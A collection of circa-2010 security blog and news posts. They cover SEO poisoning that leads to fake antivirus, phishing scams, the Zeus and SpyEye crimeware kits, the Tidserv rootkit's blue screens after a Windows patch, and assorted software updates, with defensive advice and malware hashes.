SEO poisoning not in well, but it’s aiming for the water heater

People looking to take advantage of the savings from the government during these harder financial times are being hit with other financial burdens (Rogue AV software).

Our (environmentally conscious) researcher Adam Thomas heard about a “green” hot water heater that might be a good addition to his Earth-friendly home. So he did a Web search for “GE geo spring water heater.”

What he found wasn’t Earth or anything else-friendly! SEO poisoning galore:

Here’s what the malicious pages deliver:

It’s the SecurityTool rogue that has been making the rounds since October (Read More here.)

Here's the link to the U.S. Department of Energy program that gives rebates for Energy Star appliances http://www.energysavers.gov/financial/70020.html .

Insight into fake AV SEO

In this post I want to highlight how SEO attacks are working:

1. Pages using server side kits to fool search engine bots into ranking them high in results are uploaded to legitimate web sites. If all goes to plan, when a user searches for a popular term, high up in the search engine results are links to these pages. In the example below, the malicious SEO page was the 2nd item in the search results (highlighted in blue).
2. When the user arrives on such a page (highlighted in green in the example below), the referrer is typically checked to ensure they came from a search engine. If so, there are redirected (302 redirect) to another site (orange below).
3. There are typically additional levels of redirection from this point. In the example shown below, the user is bounced from the .org to the .in site (purple).
4. Finally, the user will be redirected to the fake AV distribution site (red). This is where the user receives the usual visual trickery, in order to fool them into installing the rogue application.

So how do you protect against these attacks? Of course, detected the fake AV itself is important, and as Graham indicated, Mal/FakeAV-BW does just that for this spate of attacks. But there are additional layers of protection as well, which are equally important.

The first is URL filtering - blocking access to the malicious sites used in these attacks. This is highly effective, made ever more challenging with attackers continually using freshly registered domains (.in being a current favourite). On top of this, detection of some of the redirect pages themselves can be really valuable. Earlier this week I added Troj/JSRedir-AT for this very purpose. Additionally, detection for the scripts used in the fake AV distribution sites themselves provide another tier of protection (blocked as Mal/FakeAvJs-A). With this detection in place, when the user clicks on the SEO link in the search engine they simply see a block page and the attack is thwarted.

If I look through some of the URLs on which we have been detecting Troj/JSRedir-AT over the past 24 hours, I can extract the search terms that the user was using. The usual suspects are present: ‘killer whales’, ‘Winter Olympics’, technology, Tiger Woods (sigh) and ‘American Idol’ (bigger sigh).

jagr+hit
ovechkin+hit+on+jagr
Cheryl+Bernard+swimsuit
Dawn+Brancheau
hannah+storm+outfit+picture
Hannah+Storm
olympic+hockey+bracket+2010
seaworld+accident
shamu+attacks
who+did+tim+urban+replace+on+american+idol
tiger+woods+apology+video
american+idol+judges
motorola+backflip+specs
Scotty+Largo+Pictures
seaworld+trainer+killed
shamu+attacks
usa+hockey+roster
natalee+holloway+latest+news
natalie+holloway
yu+na+kim
whale+kills+trainer+video

As ever, it is the combination of product technologies that provide the best protection against such threats.

Troj/IFrame-DY: Old websites don’t die they just get infected

Earlier this week Sophos informed a UK Local Police Authority (Hertfordshire) that a website they owned was infected with Troj/IFrame-DY.

It turns out that the Police Authority has a new site and the infected site is an old one that just leads the user to the new site:

Unfortunately, the old site also contains a malicious script, appended after the closing /HTML tag.

There are several ways of migrating users to a new website:

• Deleting the old and let a search engine take the strain
• Doing Server side redirects
• Asking the ISP to point the old website to the new sites IP address.
• and relying on client side redirects.

There are benefits and costs for all the above methods, however, from a security point of view having an old abandoned (not updated and secured) website is the worst.

Do I Know You?

Imagine that you’re sitting at home catching up on your email backlog. In comes an email from your ISP, FooBarBazCo (some creativity required here, I know). The email seems to be from Technical Support  – ‘From:    FooBarBazCo.com Team’ – and states that you need to update your email settings as a result of a recent security upgrade. Can you trust it?

Today we observed an increase in spam messages containing links to a particular malicious URL. The messages masquerade as having come from mail administrators, with the ‘from’ address spoofed so that they appear to have come from the same network domain as the address to which the mails are sent (the ‘from’ and ‘to’ addresses are actually identical, although this will not be visible in most email programs).

The received messages state that mailbox 'settings were changed' and urge users to 'apply the new set of settings' by clicking a link to an executable, which unsurprisingly turns out to be malicious:

Clicking the link leads to a download of the following misleading application, which we see here with the usual UI misspellings and fake scan results:

And, naturally, the usual prompt for registration:

Uh-oh: "25 critical system objects"! But I just installed the OS!

Symantec products detect the downloaded misleading application as AntiVirus2010. Do always be sure, however, to confirm with your ISP or IT team before following such “directions” to run a particular file and certainly before running any unknown executables hosted on external domains.

Facebook's news-feed patent could mean lawsuits

(CNN) (CNET) -- Facebook this week was awarded a patent pertaining to streaming "feed" technology -- more specifically, "dynamically providing a news feed about a user of a social network," complementing another patent filing that has been published but not yet approved.

The implications for this, as AllFacebook.com pointed out earlier on Thursday, are far-flung: Facebook may choose to pursue action against other social-media sites that potentially violate this patent.

Twitter, as AllFacebook points out, is effectively one giant news feed, to the extent that it clearly has influenced some of the changes that Facebook made to its own feed technology.

That reaction could be alarmist. And yet prominent figures elsewhere in the social-media world don't seem thrilled.

"There goes the neighborhood," quipped Chris Messina, an open-standards advocate who recently joined Google as a member of its new Social Web Team, on Twitter.

"Can I start screaming loudly about patent reform now?" tweeted Matt Galligan, who founded a streaming-feeds start-up called Socialthing and eventually sold it to AOL.

Indeed, technologies that now may be technically encompassed by Facebook's patent are so widespread on the Web that they're more or less inextricable from the basic tenets of social media.

We'll probably be hearing more about this patent and how it changes the industry before long.

How times do change: When the "news feed" first launched in the fall of 2006, members revolted in one of the first instances of large-scale Facebook user outrage.

They denounced it as "stalkerish" and disapproved of what they saw as a lack of privacy controls. Facebook founder Mark Zuckerberg ultimately posted an apology note to the company blog in response.

Zeus botnet continues: 2,500 victims estimated

Herndon, Va., forensics firm NetWitness has said that the Zeus botnet has breached the networks of nearly 2,500 organizations in nearly 200 countries, including 10 U.S. federal agencies. NetWitness researchers said many victims are Fortune 500 companies in energy, finance and high tech sectors.

NetWitness based its conclusions on information from a 75-gigabyte collection of data that they intercepted. It was information the botnet had stolen in one month.

The Zeus botnet, which started in 2008, is believed to have 74,000 machines infected.

Researchers said the group behind Zeus also had machines infected with Waledac and had changed instructions in the botnet several times in order to find and steal different types of data.

The botnet controllers, using servers in Germany and the Netherlands, had breached networks in 196 countries including Egypt, Mexico, Saudi Arabia, Turkey, and the U.S.

Story here.

Scammers Offering Tax Refunds

Fraudsters never seem to rest. They have now turned their attention towards phishing using the Indian Income Tax Department’s name and branding. It is the season of tax returns in India and it is well known that people will file their income tax returns for the end of the fiscal year in India. Hence, phishers have chosen the right time to phish the market since most users will not be aware of these attacks.

Attackers are sending spam email messages with subject lines such as, “Tax Return!“ with the below body text:

“Dear applicant, After the last annual calculation of your fiscal activity we have determined that you are eligible a tax refund of XXX Rupees. To access the form for your tax refund please click here.”

The link that is provided is titled “Tax Refund Online Form” and it leads to a phishing site that is a spoofed version of the Indian Tax Department site, incometaxindia.gov.in. The phishing Web page asks customers to submit their sensitive information such as personal information and bank or credit card details.

Below is a screenshot of one such phishing site:

After submitting the information the page redirects to the legitimate site of the Indian Tax Department. The domain name of the fraudulent site is hosted on U.S.-based servers.

Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:

Caution:

• Please be very careful when handling suspicious emails and URLs that are seeking personal information.
• Do not visit any links in email messages of dubious origin or intent.
• Do not enter any of your details on these kinds of sites.
• Please use the legitimate site of http://www.incometaxindia.gov.in/ for any help regarding an income tax refund in India.

Apple iPhone Warranty Scam

Symantec has recently observed phishing scams targeting Apple iPhones in order to gain serial numbers, IMEI, model, and capacity, etc.

What is an IMEI?

An IMEI (international mobile equipment identity) is a 15-digit unique number used by GSM networks to identify valid devices. Every GSM, WCDMA, or iDEN mobile phone (and even the odd satellite phone) has an IMEI. It can be found under the battery of the device or by typing *#06# on the mobile. If your phone or device is lost or stolen you can report it to your service provider, providing the IMEI number. The service provider can then blacklist the IMEI number, rendering the device unusable in that country.

Why do scammers need the IMEI number?

A device with a blacklisted IMEI is unusable in that country. There is no restriction on having the same IMEI number for two devices. So, scammers can simply steal the number from other users who have valid or working IMEIs and copy it to the stolen device. Scammers can then use the stolen device or even sell it.

How are scammers stealing IMEIs?

Scammers have been creating phishing sites that make the claim that a free one-year warranty extension for a certain mobile device or devices is available. To obtain the (fake) offer, users are asked to provide their device information, including serial number, IMEI number, type of phone, and so on. Below is an example of such a phishing scam:

Once the scammers gather the iPhone information for valid devices, they replicate it to the stolen devices. The process of changing the device IMEI isn’t difficult to perform. It can be done by installing some drivers onto a system that is connected to the mobile device through a USB cable, without the use of any external devices. This way they can convert the device information to any set of data that they choose.

Giving out device information can be dangerous because criminals can use such info to perform illegal activities. Therefore, it is recommended that users remain wary and use caution when it comes to these types of scams.

Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:

• Do not click on suspicious links from emails.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand directly into your browser’s address bar rather than following any link.
• Frequently update your security software, such as antivirus and antispyware

30 percent of U.S. is totally safe from Internet threats

A survey of 54,000 households (129,000 people) commissioned by National Telecommunications and Information Administration (NTIA) last year found that 30 percent of U.S residents did not use the Internet at home or at work.

The study, based on Census Bureau work, found that 64 percent of households had connections. In 2007, only 51 did.

The NTIA researchers found that of those without connections, 38 percent said they didn’t need Internet and 26 percent said it was too expensive. In rural areas, 11 percent said they didn’t have any Internet access available. In urban areas, one percent said they couldn’t get it.

Story here.

Report here.

Exploit for zero-day vuln in Firefox is for sale

Evgeny Legerov, founder of Intevydis in Moscow, has created an exploit that hits a previously unknown heap-corruption vulnerability in the Firefox browser. The code isn’t readily available though, since he’s put it in a module to the automated exploitation system he sells (reportedly at a considerable price.) Legerov has not provided information on the vulnerability to Mozilla.

The Intevydis site says: “Exploitation frameworks are not new on the market, but only we may offer you hundreds of CANVAS modules for unpatched and unknown vulnerabilities in highly popular software products.”

The exploit works against Firefox v 3.6 on Windows XP and VISTA.

If Legerov hasn’t given Mozilla details of the hack, as one would under the rules of responsible disclosure, it raises the question: “who does he sell his software to?”

There don’t seem to be any more details of the vulnerability available. Expectations are that the exploit will be more widely available in the wild shortly. Vulnerability research firm Secunia gives general sort of advice for users:

“Solution

"Do not visit untrusted websites or follow untrusted links.”

Story here.

Symantec Reputation-based Security: Suspicious.Insight detections on VirusTotal

Symantec recently upgraded their scanner on VirusTotal to include their new reputation-based security engine. That has caused a spike in their detection rates, in particular Suspicious.Insight detections, and so I thought I’d take a few minutes to explain some of the background and what is going on.

So what exactly is a Suspicious.Insight detection? These detections are derived from Symantec’s new reputation-based security technology. They highlight files that have not yet developed a strong reputation (either good or bad) amongst Symantec’s community of users. their goal is to keep their users’ machines safe, and part of achieving that goal means helping their  users make informed choices about the files they allow on to their systems. Suspicious.Insight detections help shine a spotlight on files that have not yet developed a full reputation.

Why are they doing this, and what’s wrong with the conventional approach to security using traditional antivirus signatures? Unfortunately, traditional antivirus techniques are no longer as strong a defense as they used to be. Over the last few years Symantec has observed a seismic shift in the threat landscape. Consider this: ten years ago, Symantec published little more than a few handfuls of new virus definitions each week. Today that number has grown dramatically and they currently publish, on average, well in excess of fifteen thousand new virus definitions each day. So, why is this? Well, virus writers have realized that that once a virus definition for their malware exists, their game is over. So instead of hoping that a new threat will make its way across the globe to a large number of people and not be blocked by an security product’s latest signature, they are today focusing their efforts on shape-shifting as frequently as possible to avoid the traditional detection methods.

They use techniques such as server side polymorphism, obfuscation, and encryption to cloak their threats in a disguise, and then change that disguise as frequently as possible. So today, the vast majority of malware is generated in real-time on a per-victim basis, which means that each such malicious program will be rated as being entirely new and low-prevalence by a reputation-based system. In contrast, most legitimate software has vastly different characteristics—it often comes from known publishers, has high adoption rates, shares much in common with earlier versions of the software, and so on. The Suspicious.Insight detection, therefore, is meant to inform the user that a given application is unproven and not yet well known to Symantec’s tens of millions of users.

Does this mean that all Suspicious.Insight detections will be flagged by Norton and Symantec products? No, and for several reasons:

• This detection looks at many different aspects of a file, including how it arrived on the system, publisher information, when it arrived, etc. Using these attributes, most users do not see Suspicious.Insight detections on clean files. (Note that on an online scanner such as VirusTotal, many of these attributes are absent, hence a Suspicious.Insight detection will be more likely). In effect this means that most users will never encounter a Suspicious.Insight false positive.
• Today, Norton products warn the user about Suspicious.Insight detections, they do not block these files. The file is labeled "unproven," and the user is allowed to make the final decision. Note that future versions of Symantec's corporate Endpoint Protection products will include reputation and will allow administrators to configure blocking policies based on their specific tolerance for risk.
• Due to the nature of their reputation system, even if a clean file is initially flagged as "unproven" (which is rare), it will typically develop a good reputation very quickly—usually within a day or two.

Ultimately the goal of Suspicious.Insight is to empower their users to make better informed choices about the software they allow onto their machines.

For more information, check out the following resources:

Blog: Norton Internet Security 2010 – Download Insight
Blog: The New Model of Consumer Protection: Reputation-based Security
Product Tutorial: How To Use Norton Download Insight

0day vuln in Adobe Download Manager disclosed

First, make a note: after Adobe updates, restart your machine immediately to remove the Adobe Download Manger – it can be a vector for malcode.

Now, back to our story.

Aviv Raff has discovered a vulnerability with Adobe’s web site in combination with its Download Manager, an ActiveX script that is used to download updates for Reader and Flash. After a Reader or Flash update the download manager remains running on a user’s machine until it is rebooted. Malicious operators could exploit it to download their code of choice.

Raff demonstrated the flaw by using the download manager to download a copy of Windows calculator.

He has notified Adobe of the problem but not publically disclosed the finer details vulnerability.

Raff’s blog post here.

News story here.

Antivirus NOT

“Dammed thieves. Stole our logo. I suppose we should be flattered, though.”
— A.E.

Old rogue, new package:

AntivirusProtectionCenter
av2009.exe :
crc6:7f3d73762762
crc8:003091628c68decc
md5:d71d1e303ab963fdae76936ba52a05b7

AMC.exe :
crc6:1d6922972762
crc8:003005cfbb91b729
md5:e5555754fd758fc2be1374796f9433e2

Hash’s different from their PersonalAntiMalware added 2/16/2010

opener_.exe :
crc6:8ee75c08081d
crc8:00dc55e5aaa82efa
md5:5bb290cd1eb419ca98ca1f31273f7219

“It’s the same gang that had the code saying ‘hello Sunbelt software’
They are watching us.”
— P.J.

Internet users skip security because of jargon

Representatives of computer companies and governments meeting at the EastWest Institute security meeting in Brussels said that an industry culture of obscure jargon is preventing the world’s two billion Internet users from putting security measures in place to protect themselves.

The group met to figure out how to protect computer users from massive abuse, fraud, online theft, vandalism and espionage.

The New York Times story carried the following quotes from those at the meeting:

"The malicious and criminal use of cyberspace today is stunning in its scope and innovation," -- Dell Services President Peter Altabef.

"If you don't demystify security, people become anxious about it and don't want to do it…. There are some people in the profession who to some degree enjoy the mystification of what they do, that it's not penetrable. It's almost a sense of superiority," -- former U.S. Homeland Security Secretary Michael Chertoff

"We use a lot of complex terminology where it's not needed. We don't encourage people to think enough," -- Steve Purser, head of Technical Competence at the EU’s European Network and Information Security Agency.

The ugly reality is that computers are not simple and computer security is very technical and ever-changing.

Personally I don’t think very many technical people have the “sense of superiority” that Chertoff mentioned. A huge number of them have mathematical, detail-oriented minds and they simply aren’t good communicators. There are fabulous communicators in the computer security space, but, it takes a “big picture” mind set to communicate well. It takes a “little-tiny-detail” mind to write code, run networks and keep security systems running.

The best we can do is to keep trying through:

-- industry wide consciousness that we NEED to explain things to non-technical people
-- company blogs written for the common user
-- resource pages with easy-to-understand materials about security
-- organizations such as the various Computer Emergency Response Teams (CERTs) and non-profit organizations
-- security-awareness days and PR events
-- graphic user interfaces, help screens and manuals written with inexperienced users in mind

Companies, organizations and government agencies should hire professional communicators, teach them computer security and have them write/tweet/blog/speak to teach kids and the “home user” what they need. Hey, the newspaper business is going the way of the buggy-whip industry. There are loads of great journalists out there looking for a new career.

That’s how I got here.

Story here.

A great resource for “non-technical” people can be found at US-CERT’s site: http://www.us-cert.gov/nav/nt01/

And the National Cyber Security Alliance site StaySafeOnline.org: http://www.staysafeonline.org/

The .ru Substitutions for .cn Domains

In the month of January, we reported a drop in .cn spam. This was due to changes in the domain registration process introduced by CNNIC. In the first week of February, the .cn spam volume fell further and fluctuated between 0 and 4 percent of total URL spam.

Another interesting trend was observed during this period. On January 21 the volume of spam containing the .ru top-level domain (TLD) spiked up to 9 percent, and rose further up to close to 40 percent on February 8. Upon closer analysis, it was observed that the .cn domains used in the health spam attacks had been replaced with .ru domains.

Various subject lines observed in the .ru version of health spam are as follows:

Subject: Dear xxxx Extreme 83% discounts
Subject: Your Future Order with 79% off retail
Subject: Sales Event get 78% off
Subject: xxxx Sale Day, save 80%!

The spammers’ move to deviate from using .cn domains is quite obvious: because of the complexity in registering new .cn domains. For now, there is no significant variation in the spam volume containing other TLDs. However, in the future, spammers may try registering domains that are easily available. Symantec will keep a close watch on variations in this trend to keep our readers informed.

Phishing the Brands of Online Auction Marketing Tools

The popularity of online auctions paves way for the development of online auction marketing tools. These tools are software applications that are intended to facilitate the sellers’ side of popular online auction websites. Some of the tools that help sellers in auctions are: image hosting to display galleries of their products, listing of best bidders in a single template, automatic inventory systems to notify sellers during low stocks, etc. With the help of these tools, online auctions are easier and time saving.

Phishing attacks targeting the brands of online auction and shopping websites are common. For better success rates, phishers are now trying alternate means to obtain the credentials of online auction customers by attacking legitimate brands providing auction-marketing tools.

Below is a phishing site that spoofs the branding of a leading auction marketing tools website:

Upon entering credentials onto the auction tools phishing site, the user will be asked for verification of the main online auction website, as in the above example. The phishing page states that the verification process is required to obtain a token for access of tools. The page states that if the user opts out of the token verification process, tools that enable the import of seller information, financial gains from shipping insurance, and the update of image-scrolling galleries of products, etc. will not be available to the user. A link is provided in the phishing page that states, “Verify your token.” Upon clicking the link, the page is redirected to the phishing page of the main auction website.

Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:

• Do not click on suspicious links in emails.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand directly in your browser rather than following any link.
• Frequently update your security software, such as antivirus and antispyware.

Do They Know it’s (not) Christmas Time at All?

I saw something quite funny when checking out the spam feeds the other day. An attachment kept appearing, once in a while, with a name of Christmas Card.zip. It was making sporadic appearances in the feeds (and the number of spam email messages was quite low), but there were a couple of these odd messages at equally odd hours of the day:

The email message itself was a run-of-the-mill electronic greeting card with an HTML body containing a nice Flash animation—the Flash animation actually comes from a legitimate source (123greetings.com). The email body contains a message asking the user to open the attachment to see who sent the email. Of course, opening the attachment yields a malicious file. The name of the file inside is Christmas Card.htm[MANY SPACES].exe and it is already detected by Symantec as W32.Ackantta.G@mm.

The question I leave you with is this: are the people behind the Ackannta worm living in some kind of a parallel universe or time warp where every day is Christmas? Or perhaps it is some worm gone out of control? I'll leave you to ponder that one. Bearing in mind that it is now mid-February, you can either consider them late to the Christmas party or way too early.

The Facebook Team informs you…

In the last two days our lab has detected a flood of email messages that seem to have been sent by the Facebook team urging users to submit a new account agreement. We’ve seen around 16,000 since yesterday.

The subject of the message is UPDATED ACCOUNT AGREEMENT and the attached file is called AGREEMENT.ZIP.

The message is like the following:

Users are required to submit a new account agreement before a certain date. If not, their Facebook account will be restricted. The message also contains detailed instructions on how to do it.

We’ve seen this type of menacing messages other times before, for example with  Hotmail or MSN Messenger accounts. But now that Facebook is so popular and is continuously undergoing changes and updates, this is a good way to trick users.

Perhaps many people think it’s not true but, just in case, let’s try and see what happens…
And what happens is that if you follow the instructions given in the email and run the file “agreement.exe”, you’ll be installing the rogue antivirus SecurityTool in your computer.

This program not only displays annoying warning infection messages like many others, but also restarts the computer, prevents the executable files from being run and leaves the screen blue not allowing you to work with the computer.

So, don’t trust any message like this and be sure that if the Facebook team wants to inform users of any changes or update that require their collaboration, they’ll be published in your Facebook account.

Security Advisory, Adobe Reader

It's Fat Tuesday — time for an Adobe Update.

Adobe plans to release a security update for Adobe Reader and Acrobat later today.

Read Security Advisory APSB10-07 for additional details.

Tiger’s play too rough on Valentines Day

While most sane people around the world are enjoying a romantic Valentine’s Day today, we at SophosLabs remain vigilant on the front line of the war against malware.

This year, Valentines Day coincides with the Chinese New Year as well as the start of the Winter Olympics in Vancouver, and many malware attacks have centred around SEO poisoning of these and other topical search terms.

The Chinese New Year of the Tiger is proving a popular target, especially as this ties in with any Tiger Woods related searches:

As we are seeing on a daily basis, topical issues that have spawned a large number of searches become the target of Fake AV authors:

Tragic events are also fair game:

As well as having up to date Anti Virus one way to avoid attacks such as these is to use a browser plugin such as NoScript that blocks the execution of JavaScript from untrusted sources.

So far I haven’t seen any “Free tickets to Paris for Valentine’s Day” spam but there’s always next year I suppose…

Unusual Valentine’s Gift Unwraps FakeAV

While everyone is searching the web for the unusual gift on Valentine’s Day, Cybercriminals take this opportunity to propagate Rouge Antivirus.

I have searched for the keywords “unusual-valentines-day-gifts”, gives the following results:

Clicking the highlighted link above will lead to fake message such as “Alert! Your system is exposed to risk of virus attack. It’s highly recommended to check your PC immediately. Press OK to start the scan right now”.

And then eventually leads to the fake scanning page that will surely alert you to download and execute binary file, just like this one:

Executing the downloaded file will install Fake Antivirus.

Be extra careful on what you’re clicking and don’t execute files downloaded from untrusted sites.

Tidserv and MS10-015

In the past, viruses and computer threats were created simply for the sake of it. Sometimes these threats would wipe your hard drive clean—just to let you know you’d been owned. This is not the case anymore; nowadays most of the threats we see are profit-oriented and try to keep a very low profile so that they aren't easily detectable by security software.

Backdoor.Tidserv does a very good job in that sense, especially with the latest version (TDL3), which uses an advanced rootkit technology to hide its presence on a system by infecting one of the low-level kernel drivers and then covering its tracks. While the rootkit is active there is no easy way to detect the infection, and because it goes so deep into the kernel, most users cannot see anything wrong in the system.

Most of the time the driver chosen by Tidserv to be infected is “atapi.sys,” but that may vary depending on the hardware configuration. One of the very things the infected driver does when it is loaded by the operating system is to retrieve critical API addresses so that it can allocate memory to load the actual malicious code:

These APIs are retrieved via hard-coded relative virtual addresses (RVAs) into the kernel module, which are calculated at the infection time. Microsoft recently released a kernel patch that addressed a non-related issue (MS10-015 / KB977165), which updates the kernel modules. They also released a blog about blue screen issues after applying this patch.

What seems to have happened in Tidserv's case is that after this update, the RVAs for the above mentioned APIs changed—therefore causing the infected drivers out there to call invalid addresses and, in turn, cause blue screens every time Windows boots up:

Even worse, because the infected driver is critical for system boot-up, Windows will not boot in Safe Mode either. However, there is still hope for the users who get stuck in this infinite loop of BSoD, in the sense that they are not required to reinstall everything from scratch, but only the infected driver (from a known, clean source). And, here is an example for the most commonly infected system driver, atapi.sys:

1. Boot from a clean source (e.g. Windows CD)
2. Locate the infected partition, which is normally the boot partition
3. Replace atapi.sys in \%Windir%\system32\drivers with the clean backup copy
4. Reboot

Here's a list with the most common driver names infected by the rootkit, which can be used in the above process:

• atapi.sys
• iastor.sys
• idechndr.sys
• ndis.sys
• nvata.sys
• vmscsi.sys

We are aware that the blue screens may be caused by other good or bad kernel mode applications that were relying on hard coded addresses, but Tidserv is one of the most prevalent threats that may cause this problem. Symantec detects these infected drivers on disk as Backdoor.Tidserv!inf, but recommends that the files are replaced manually, since attempting to remove the file automatically may render the system unbootable.

In conclusion, it seems that no matter how complex and stealthy a threat may be, it may be given away by such a small thing as a software update. This should be a lesson for the authors that developed the rootkit—but more importantly or the victims that fell for the back door.

Sun VirtualBox Update [3.1.4.57640]

VirtualBox is a general-purpose full virtualizer for x86 hardware. Targeted at server, desktop and embedded use, it is now the only professional-quality virtualization solution that is also Open Source Software.

Some of the features of VirtualBox are:

Modularity. VirtualBox has an extremely modular design with well-defined internal programming interfaces and a client/server design. This makes it easy to control it from several interfaces at once: for example, you can start a virtual machine in a typical virtual machine GUI and then control that machine from the command line, or possibly remotely. VirtualBox also comes with a full Software Development Kit: even though it is Open Source Software, you don't have to hack the source to write a new interface for VirtualBox.
Virtual machine descriptions in XML. The configuration settings of virtual machines are stored entirely in XML and are independent of the local machines. Virtual machine definitions can therefore easily be ported to other computers.

Download: http://www.virtualbox.org/wiki/Downloads

Google Chrome Dev Channel Update [5.0.322.2]

The Google Chrome dev channel has been updated to 5.0.322.2 for Windows, Mac and Linux platforms

All

• [r38242] Don't crash when a theme specifies a nonexistent image. (Issue: 31719)

Mac

• [r38319] Honor modifiers for clicks on home button – cmd-clicking the home button now opens your home page in a new tab. (Issue: 34900)
• [r38204] Implemented writing direction context menu in text input fields.
• [r38504] Add local storage nodes to the cookie manager (Issue: 33068)

Linux

• [r38320] Use of Freetype's emboldening for fonts that don't provide bold. Fixes the sometimes blurry bold fonts. (Issue: 22360)
• [r38372] Can now drag and drop bookmarks from Firefox. (Issue: 34141)
• [r38246] Implement content blocking address bar icons and bubbles (Issue: 33314)

Native Client

• Chrome for Linux and Mac OS 10.6 can now run Native Client modules directly, no plugin required. To enable this features, run Chrome with the following command line flags --internal-nacl --enable-gpu-plugin --no-sandbox.
• Platform-independent NPAPI extensions for 2D, 3D, and mouse/keyboard events are now available.
• We'd like to hear from you. Please send feedback to native-client-discuss@googlegroups.com,

Extensions

• [r38239] Don't crash when extensions use cookie. (Issue: 34649)
• [r38407] Preserve order of browser actions across extension autoupdate. (Issue: 33401)
• Implemented overflow and reordering of browser actions (this was actually in the last update, but missed the release notes)

Known Issues

• Linux: Crash when editing a bookmark in the bookmark manager (Issue: 35438)
• All: Chrome doesn't show popup blocker bubble (Issue: 35594)
• Mac/Linux: Can't save cookie settings (Issue: 35307)

More details about additional changes are available in the svn log of all revisions.

You can find out about getting on the Dev channel here: http://dev.chromium.org/getting-involved/dev-channel.

If you find new issues, please let them know by filing a bug at http://code.google.com/p/chromium/issues/entry

Warning over sexy instant message called 'Fembot'

(BBC) Lonely internet users are being warned about Fembot, a piece of malicious software that poses as a flirtatious woman looking to chat on instant messaging services.

Victims are persuaded to give out personal information that could be used for fraud or identity theft, according to security experts.

Fembot was first spotted in 2007 but hasn't been seen much since then.

However, there are signs she may be back on the scene in time for Valentine's Day.

She may also be sporting a new, more sophisticated look, according to Richard Clooke from PC Tools.

"These types of attacks have moved on significantly in this time," he said. "The intelligence has improved such that they can tailor their discussion based on the information they are getting and then change their questions or answers to reflect the responses."

Researchers say Flirtbot-type software typically directs an instant messaging user to click through to a website which may request credit card details or force a virus on to their computer.

"There is a certain part of the population who are willing to engage in these kinds of conversations," added Richard Clooke.

In 2007, a Russian company called CyberLover.ru claimed it had developed software that could successfully pass itself off as a member of the opposite sex.

There's no suggestion that CyberLover was involved in the criminal side of online virtual flirting.

However, it is thought that similar technology is being used by the latest generation of Flirtbots.

P2P research: clue needed

At the ShmooCon hacker conference in Washington, D.C., last week two security researchers showed the very sensitive information that people inadvertently make available over peer-to-peer networks.

In their presentation, “Information disclosure via P2P networks: Why stealing an identity via Gnutella is like clubbing baby seals,” pen testers Larry Pesce and Mick Douglas said they found a lot of music, porn, malcode collections and the following:

• driver's licenses, passport and tax return forms with Social Security numbers;
• someone's will
• A retirement analysis form with savings account totals and income estimates;
• An IRS form with taxpayer identification number;
• A completed Turbo Tax form with personal information filled in.

The two have started The Cactus Project to help security specialists do similar research to help organizations tighten up the information they share over P2P. They list best-of-breed tools for conducting the research, including Mutella and the Gnutella Protocol on their site http://pauldotcom.com/cactusproject.html.

The Network World story quotes Douglas: “"We have to keep trying to educate people, but through this kind of research [security practitioners] can take steps to better protect their own organizations going forward.

Network World story here.

These guys are clearly having too much fun. Below is a quote from the pauldotcom.com site:

“I often say that we are in one of the only professions I know of which is destined to fail. You will have a breach and there will be compromises; you will get called out. In light of this reality I still find that information security professionals are a fairly happy lot. The trade-off for having the cards stacked against us is in that we get to work in one of the coolest fields.”  (http://pauldotcom.com/cactusproject.html)

Real life Mafia Wars: Spy Eye tool kit goes after Zeus botnet

Peter Coogan at Symantec put up a very interesting blog post yesterday about a crimeware kit called SpyEye v1.0.7 (on sale now on Russian sites -- $500) that has a module that will kill a Zeus bot infection on a victim’s computer so the bot created by SpyEye can take it over.

In September, Computer Weekly reported the Swedish telco Telia Sonera shut down the Internet connections of Latvian company Real Host after it was linked to the Zeus botnet. At the time, researchers said they believed Real Host's servers had captured about 3.6 million PCs for the Zeus botnet.

They linked Zeus to a Russian gang named Rock Phish which is believed responsible for a massive amount of the phishing attacks aimed at stealing credit card and banking information.

The Zeus network took the hit and recovered, however, sending out massive malicious spam campaigns to infect more machines. One campaign carried an income tax topic in September and another had H1N1 as a lure in December.

Coogan said the SpyEye kit can also create crimeware with:
• keyloggers
• credit card modules
• daily email backup
• encrypted config files
• Ftp protocol grabbers
• Pop3 grabbers
• Http basic access authorization grabber

“If the use of SpyEye takes off, it could dent Zeus bot herds and lead to retaliation from the creators of the Zeus crimeware toolkit. This, in turn, could lead to another bot war such as we have seen in the past with Beagle, Netsky, and Mydoom.” he wrote.

He credits Mario Ballano Barcena with the analysis.

Symantec blog post “SpyEye Bot versus Zeus Bot” here.

Social media expands: LinkedIn hits 60M

A new user in the Netherlands became the 60 millionth person to sign up with LinkedIn, the professional social networking site.

Facebook says it has 400 million users of whom half log in every day.

Both are fabulous tools for communications and socializing, but making members’ identities and personal information so easily available carries some big risks. Our good friends at Sophos have pointed out that information can be harvested from LinkedIn for spear phishing. The site can contain enough information to be a virtual company directory.

There are unexpected exposures too. Imagine linking to a recruiter you’re having conversations with and being able to see the other people he or she is linked to – like your subordinates – or your boss! That spills just a bit too much info on all of us.

LinkedIn story here.

Social networking revolution brewing: the anti-“villes”

A lot of Facebook members are becoming fans of “I don’t care about your farm, or your fish, or your park, or your mafia!!”

This is basically a privacy issue I suppose.

Shortly after noon today there were about 4,000 Facebook members joining every 10 minutes!

If the surge continues it might become a Facebook denial-of-service issue!
http://www.facebook.com/pages/I-dont-care-about-your-farm-or-your-fish-or-your-park-or-your-mafia/207382931457

The Wall Street Journal reported on this last night about 10 p.m. At that point they said 2,000 people were joining per minute.

"Backlash Against Social Games Brews On Facebook"

Source code for Blackberry and iPhone spyware published

At the BlackHat DC conference and SchmooCon, Nicolas Seriot, an independent researcher and Tyler Shields of Veracode have independently presented two very similar papers.

The papers analyse weaknesses in security and application delivery models for iPhone and Blackberry and provide interesting read, especially if you are looking to write the next spyware application or a bot for one of the platforms.

For me, the most interesting part of the papers is the one that shows that regardless of the implemented security mechanisms like data caging, providing applications with its own private storage, a third party application will be able to access a lot of potentially confidential data, like contact lists, sms and email storage and even the Blackberry’s microphone.

It is known for some time that the application security model where the publisher verifies the integrity of the application (like Apple, Symbian or Google) and then publishes the application through an application store is not perfect, especially in a position where thousands of applications are published every month. It is simply not possible to check that all code behaves as the application’s developers claim.

